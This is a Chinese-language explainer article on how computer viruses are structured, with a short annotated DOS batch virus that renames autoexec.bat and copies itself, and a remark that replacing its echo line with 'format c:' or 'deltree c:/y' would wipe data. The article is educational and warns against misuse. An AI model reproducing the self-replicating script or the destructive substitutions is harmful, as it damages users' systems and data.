電腦病毒結(jié)構(gòu)怎么樣
電腦病毒結(jié)構(gòu)怎么樣
電腦病毒也是有結(jié)構(gòu)的,那么電腦病毒的結(jié)構(gòu)是怎么樣的呢?下面由學(xué)習(xí)啦小編給你做出詳細(xì)的電腦病毒結(jié)構(gòu)說(shuō)明介紹!希望對(duì)你有幫助!
電腦病毒結(jié)構(gòu)說(shuō)明一:
1. 判斷部分
判斷是否滿足發(fā)作條件
2. 執(zhí)行部分
執(zhí)行惡意代碼
3. 偽裝、復(fù)制部分
1)偽裝成正常程序,或者隱藏自身。木馬常用。
2)復(fù)制自身代碼依附到其他正常程序上(傳染),這是傳統(tǒng)病毒的特征。
電腦病毒結(jié)構(gòu)說(shuō)明二:
病毒的感染部分:
首先修改程序的頭文件,使其第一條語(yǔ)句跳到附著在文件尾部的病毒體。同時(shí)改變文件信息。
尋找系統(tǒng)漏洞,通過(guò)網(wǎng)路或郵件散播?;蛘邚?fù)制到移動(dòng)硬盤(pán),u盤(pán),軟盤(pán)。
破壞部分:
刪除啊,關(guān)掉殺毒軟件啊,盜取密碼啊。
相關(guān)閱讀:
電腦病毒工作原理
計(jì)算機(jī)病毒是指編制或者在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者破壞數(shù)據(jù),影響計(jì)算機(jī)使用并且能夠自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼。
舉一個(gè)“hello word”例子。
下面是一個(gè)簡(jiǎn)單的DOS批處理病毒源程序autoexec.bat(假設(shè)從A盤(pán)啟動(dòng)):程序語(yǔ)句 程序注解
IF exist c:\autoexec.bat goto Virus REM 首先檢查時(shí)機(jī)
Goto No_Virus REM 若時(shí)機(jī)不成熟則潛伏
:Virus REM 時(shí)機(jī)成熟時(shí)(子程序)
c: REM 轉(zhuǎn)到C盤(pán)
ren autoexec.bat auto.bat REM 將正常文件改名,準(zhǔn)備冒名頂替
copy a:\autoexec.bat c:\ REM 自我復(fù)制,開(kāi)始繁殖
echo Hello Word! REM 病毒發(fā)作,表現(xiàn)癥狀
:No_Virus REM 正常程序入口
a: REM 轉(zhuǎn)回A盤(pán)
/auto REM 執(zhí)行正常程序
pause REM 暫停等待按任意鍵繼續(xù)
這個(gè)程序非常簡(jiǎn)單,但卻包含了計(jì)算機(jī)病毒的典型結(jié)構(gòu),引導(dǎo)部分、傳染部分、激發(fā)部分等五臟俱全。其觸發(fā)機(jī)制是:C盤(pán)存在autoexec.bat文件,當(dāng)我們用帶有此病毒的啟動(dòng)軟盤(pán)啟動(dòng)微機(jī)時(shí),若C盤(pán)也有autoexec.bat文件,則病毒將C盤(pán)原autoexec.bat文件改名為auto.bat,把自身復(fù)制到C盤(pán)并顯示“Hello Word!”。如果按以前的分類,它可以算是個(gè)良性病毒(但再良的病毒都要占用系統(tǒng)資源)。當(dāng)然它還無(wú)加密和沒(méi)有嚴(yán)重破壞系統(tǒng)的行為,但要是把echo Hello Word!改為format c:或deltree c:/y等那就……
特此警告:學(xué)習(xí)病毒原理只是為了認(rèn)識(shí)病毒,以達(dá)到能夠清除病毒之目的,若誰(shuí)以此制造病毒遺害人間,敗壞門(mén)風(fēng),必遭天譴!) 用殺毒軟件就可以了,比如超級(jí)巡警就是專門(mén)防止網(wǎng)頁(yè)掛木馬病毒的 特此警告:殺毒軟件只是用于保護(hù)電腦防御的,關(guān)鍵還是在于自己的保管,比如不瀏覽那些亂七八糟的網(wǎng)站(yellow網(wǎng)站很多掛木馬的,不下載那些非權(quán)威網(wǎng)站的軟件,如果你有卡巴斯基那也行,我曾經(jīng)因?yàn)橄掠螒蛲鈷於匮b系統(tǒng)那)。
看了“電腦病毒結(jié)構(gòu)怎么樣”文章的還看了:
3.如何制作電腦病毒